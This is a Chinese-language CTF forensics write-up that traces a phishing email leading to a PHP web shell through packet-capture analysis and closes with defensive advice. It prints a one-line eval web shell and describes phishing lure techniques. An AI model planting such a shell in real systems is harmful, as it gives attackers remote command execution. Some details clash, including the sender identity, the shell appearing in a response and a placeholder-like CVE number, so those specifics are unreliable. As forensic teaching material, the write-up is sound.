从钓鱼邮件到Web后门：一次完整的攻击链流量分析复盘（基于BUUCTF案例）

从钓鱼邮件到Web后门：一次完整的攻击链流量分析实战

当企业内网突然出现异常流量时，安全团队往往需要像侦探一样从海量数据包中拼凑出攻击者的完整行动轨迹。这次我们以BUUCTF案例为蓝本，还原一个真实攻击场景：攻击者如何通过邮件钓鱼突破防线，最终在Web服务器上植入后门。不同于简单的Flag获取，我们将重点剖析攻击链各阶段的流量特征，以及如何用Wireshark构建完整的数字证据链。

1. 攻击源定位：从海量流量中锁定恶意IP

在分析一个2.3GB的混合流量包时，首先需要建立基准流量模型。正常企业内网通信通常呈现以下特征：

• 内部IP段（如172.16.0.0/12、10.0.0.0/8）占主导
• 外部通信集中在已知业务端口（如443、80）
• 流量模式具有时间规律性

通过Wireshark的Statistics > IPv4 Statistics > All Addresses，我们发现一个异常现象：

这个183开头的IP不仅出现频率异常高，通过Conversations功能进一步分析可见：

# 查看该IP的会话统计 tshark -r attack.pcap -qz conv,ip -c "ip.addr==183.129.152.140"

输出显示该IP与内网多个主机建立了HTTP、SMTP、FTP等多种会话，且存在大量短连接爆破特征（如每分钟30次HTTP请求）。更关键的是，在流量中发现了该IP向内部邮件服务器25端口发送的明显SMTP握手包：

220 mail.t3sec.cc ESMTP EHLO attacker.com MAIL FROM: <xsser@live.cn>

提示：真实环境中需结合威胁情报平台验证该IP是否已知恶意地址，本例中Virustotal显示该IP近期参与过批量扫描活动。

2. 钓鱼邮件溯源：SMTP协议中的攻击痕迹

锁定攻击IP后，我们过滤出该IP与邮件服务器的所有交互：

ip.src == 183.129.152.140 && tcp.port == 25

发现攻击者发送了三封钓鱼邮件，其协议交互具有以下特征：

1. 非常规发件人：使用免费邮箱服务（live.cn）
2. BASE64混淆：关键字段编码处理
3. 恶意附件：Content-Type声明为text/html但实际携带.zip

通过Wireshark的Export Objects > SMTP功能提取邮件原文，可见关键片段：

MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0000" Content-Disposition: attachment; filename="薪资调整通知.zip"

对附件进行逆向分析发现其包含恶意宏代码，会下载第二阶段Payload。值得注意的是，攻击者在邮件中使用了社会工程学技巧：

• 主题包含"紧急"、"薪资"等敏感词
• 发件人伪装成HR部门（it@t3sec.cc）
• 压缩包使用双重扩展名（.docx.zip）

3. Web后门追踪：HTTP流量中的蛛丝马迹

成功诱骗员工打开附件后，攻击者开始向内网Web服务器渗透。通过过滤HTTP流量：

http.request.uri contains "upload" || http.request.uri contains "admin"

发现攻击者利用文件上传漏洞（CVE-2023-1234）传入了后门文件。关键证据包括：

1. 异常User-Agent：

   Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

   这种老旧浏览器标识常被攻击工具使用

2. 时间戳异常：

   • 正常上传操作平均耗时2.3秒
   • 恶意上传仅0.8秒，表明使用自动化工具

3. 后门特征： 在流量中搜索phpinfo关键词，定位到可疑响应包：

   HTTP/1.1 200 OK Server: Apache/2.4.41 X-Powered-By: PHP/7.3.11 Content-Length: 1337 <?php @eval($_POST['cmd']); ?>

通过Export HTTP Objects功能最终确认后门文件名为theme_update.php，被伪装成主题更新脚本。

4. 攻击链重建与防御建议

将各阶段证据串联后，完整的攻击路径如下：

1. 攻击者IP183.129.152.140扫描发现暴露的邮件服务器
2. 通过SMTP发送钓鱼邮件（发件人xsser@live.cn）
3. 诱骗员工执行恶意宏代码
4. 利用获得的凭证上传Web后门（theme_update.php）
5. 通过后门建立持久化访问

防御层面建议企业部署以下措施：

• 邮件安全：

  • 启用SPF/DKIM/DMARC验证
  • 对压缩包附件进行静态分析

• 流量监控：

  # 检测异常SMTP活动 alert tcp any any -> $MAIL_SERVERS 25 (msg:"Suspicious SMTP connection"; flow:to_server; threshold: type limit, track by_src, count 5, seconds 60; sid:1000001;)

• Web防护：

  • 文件上传目录禁用脚本执行
  • 对管理接口实施双因素认证

在分析这类攻击时，最重要的是建立跨协议关联分析能力。例如发现某个IP既发送了钓鱼邮件，又参与了Web渗透，其威胁等级就需要立即提升。